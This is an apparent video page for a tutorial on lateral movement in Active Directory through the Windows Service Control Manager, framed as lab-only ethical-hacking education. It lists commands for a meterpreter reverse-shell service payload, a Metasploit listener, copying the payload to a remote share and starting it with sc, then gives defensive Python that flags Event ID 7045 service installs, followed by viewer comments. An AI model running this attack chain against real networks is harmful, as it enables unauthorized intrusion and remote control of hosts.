How to Pivot (Lateral Movement) in Active Directory Using SCM
- Published: 7 Oct 2024
- In this video we look at how to pivot within an Active Directory network environment using SCM, otherwise known as the Windows Service Control Manager.
Commands run in the video:
to create the payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe-service -o ~/Desktop/testservice.exe
to create a listener:
1. msfconsole
2. use exploit/multi/handler
3. set LHOST YOUR_IP
4. set LPORT PORT_TO_MATCH_PAYLOAD
to copy a file over to another host:
copy FILE \\HOST_IP\SHARE_PATH
to create a remote service (note that sc requires a space after "binpath="):
sc \\TARGET_IP create SERVICENAME binpath= "PAYLOAD_LOCATION"
to execute the remote service:
sc \\TARGET_IP start SERVICENAME
Enjoy!
All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed unless you have permission to do so. These videos are to be performed within a virtual lab for ethical hacking education only. We are not responsible for any misuse, damages, and or loss of data due to misuse of this information.
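From the defender's side, the remote service creation shown above leaves a System-log Event ID 7045 ("A service was installed in the system") on the target, carrying the service name, the image path and the account the service runs as. The following is an added example (not from the video or the channel) that screens a constructed batch of such records and flags installs whose binary sits outside trusted directories or on a UNC path; the dictionary shape of the records is an assumption standing in for whatever your log pipeline emits.

```python
# Constructed sample records in the shape of Windows System-log Event ID 7045.
# Field names mirror the event's own fields; all values are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Windows Update Medic Service",
     "ImagePath": "C:\\Windows\\System32\\svchost.exe -k WaaSMedicSvc",
     "AccountName": "LocalSystem", "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "testservice",
     "ImagePath": "C:\\Users\\Public\\testservice.exe",
     "AccountName": "LocalSystem", "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "RemoteSvc",
     "ImagePath": "\\\\10.0.0.5\\share\\svc.exe",
     "AccountName": "LocalSystem", "StartType": "demand start"},
    {"EventID": 7036, "ServiceName": "Spooler",  # not an install event, ignored
     "ImagePath": "", "AccountName": "", "StartType": ""},
]

# Directories a freshly installed service binary is normally expected to live in
# (lower-cased, compared as prefixes). Tune this list to your own baseline.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def executable_from_image_path(image_path):
    """Return the executable part of a service ImagePath (quoted path or first token)."""
    path = image_path.strip()
    if path.startswith('"'):
        return path[1:path.find('"', 1)]
    return path.split(" ", 1)[0]


def suspicious_service_installs(events):
    """Return [(service_name, [reasons])] for Event ID 7045 records worth an analyst's look."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 7045:
            continue
        exe = executable_from_image_path(ev["ImagePath"]).lower()
        reasons = []
        if exe.startswith("\\\\"):
            reasons.append("service binary on a UNC path")
        elif not exe.startswith(TRUSTED_PREFIXES):
            reasons.append("service binary outside trusted directories")
        # Only escalate the account detail when the path itself is already odd.
        if reasons and ev.get("AccountName", "").lower() == "localsystem":
            reasons.append("runs as LocalSystem")
        if reasons:
            findings.append((ev["ServiceName"], reasons))
    return findings


if __name__ == "__main__":
    for name, why in suspicious_service_installs(SAMPLE_EVENTS):
        print(f"{name}: {', '.join(why)}")
```

Pairing these hits with Security-log Event ID 4697 (where auditing is enabled) and with the logon that preceded them gives the source host of the pivot.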
I just discovered your videos and they are very interesting. But I'm not sure if you forgot to say this or if you used a built-in exploit, but this all wouldn't be possible if you weren't domain administrator on the compromised Windows 10 machine.
In normal business environments not every domain user is also a domain admin, and mostly you aren't even local administrator on your machine. So without local admin perms on the domain controller, you wouldn't be able to create a new service or a new scheduled task like in your other video.
Did you think about a community Discord? I would be interested to discuss such ideas in a wider community.
I haven't created a Discord yet; I thought about it though. I'm oftentimes very busy and make videos on the side. I don't make videos full time yet, as I currently work full time in cyber.
What should I do when I run the command sc \\IP create test binpath=... and it returns "access is denied"? Thank you
Hi, thanks for this video, but I need to know one thing: is there anything I have to set up or install on the DC for me to be able to copy from Windows to the DC? Do I need to enable any service or something?
Nope! Nothing at all. As long as the Windows host is added to the domain, you're good to go.
@officialexploitacademy thanks for this reply... yes, my Windows 10 is joined to my DC and both are on the same network, but the copy command is not working, and I am an admin on my Windows 10.
@wunderjoseph1136 that is interesting... what error is it giving you? Is the domain controller running in the background?